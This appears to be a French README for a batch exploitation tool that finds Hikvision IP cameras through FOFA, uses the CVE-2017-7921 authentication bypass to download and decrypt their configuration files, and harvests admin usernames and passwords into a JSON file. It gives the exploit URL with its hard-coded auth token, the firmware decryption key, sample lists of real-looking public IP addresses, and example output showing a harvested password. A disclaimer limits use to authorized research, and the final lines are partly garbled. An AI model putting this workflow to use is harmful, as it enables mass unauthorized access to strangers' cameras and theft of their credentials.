
Utilisé pour tester rapidement la vulnérabilité CVE-2017-7921 de Hikvision à l'aide de FOFA, et donne le compte et le mot de passe de connexion, et génère un fichier json.
Déclaration de sécurité : cet outil est réservé à la recherche de sécurité autorisée et à la validation des vulnérabilités.
Avis important : en utilisant cet outil, vous acceptez les conditions suivantes.
Ce projet suit la politique de recherche de sécurité de GitHub et les normes de divulgation du Centre de réponse à la sécurité de Hikvision.
Outil de détection et de validation groupée de la vulnérabilité de contournement d'authentification CVE-2017-7921 sur les caméras IP Hikvision. Il prend en charge le déchiffrement automatique des fichiers de configuration et l'extraction des informations d'identification.
git clone https://github.com/[votre_nom_d_utilisateur]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Créez un dossier zc/ dans le répertoire de l'outil et placez-y la liste des appareils au format JSON (un objet par ligne) :
mkdir zc
Exemple de fichier : devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Description des champs :
| Champ | Description | Obligatoire |
|---|---|---|
link | Adresse d'accès HTTP/HTTPS de l'appareil | ✅ Oui |
city | Ville | ❌ Non |
country | Code pays | ❌ Non |
org | Organisation / FAI | ❌ Non |
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Outil d'analyse groupée de la vulnérabilité du fichier de configuration des caméras Hikvision
════════════════════════════════════════════════════════════════════════════════
Fichiers JSON disponibles :
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45 678 octets)
════════════════════════════════════════════════════════════════════════════════
Veuillez sélectionner le numéro du fichier : 1
Fichier sélectionné : devices_2025.json
Chargement des données des appareils...
Nombre total d'appareils à analyser : 2000
Entrez le nombre de threads simultanés (par défaut : 5) : 10
Nombre de threads simultanés : 10
Début de l'analyse...
Nombre total d'appareils analysés : 2000
Nombre d'appareils vulnérables détectés : 127
Appareils vulnérables enregistrés dans : vulnerable_devices.json
L'analyse génère un fichier vulnerable_devices.json contenant toutes les informations sur les appareils vulnérables.
Exemple de sortie :
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK utilise des informations d'identification codées en dur.279977f62f6cfd2d91cd75b889ce0c9a est codée en dur dans le firmware.0x73, 0x8B, 0x55, 0x44).Ce logiciel est destiné uniquement à la recherche de sécurité autorisée et à des fins éducatives. L'utilisateur est tenu de veiller au respect de toutes les lois applicables.
Dernière mise à jour : 2025-01-29 | Version : v1.0.0 | CVE concernée : CVE-2017-7921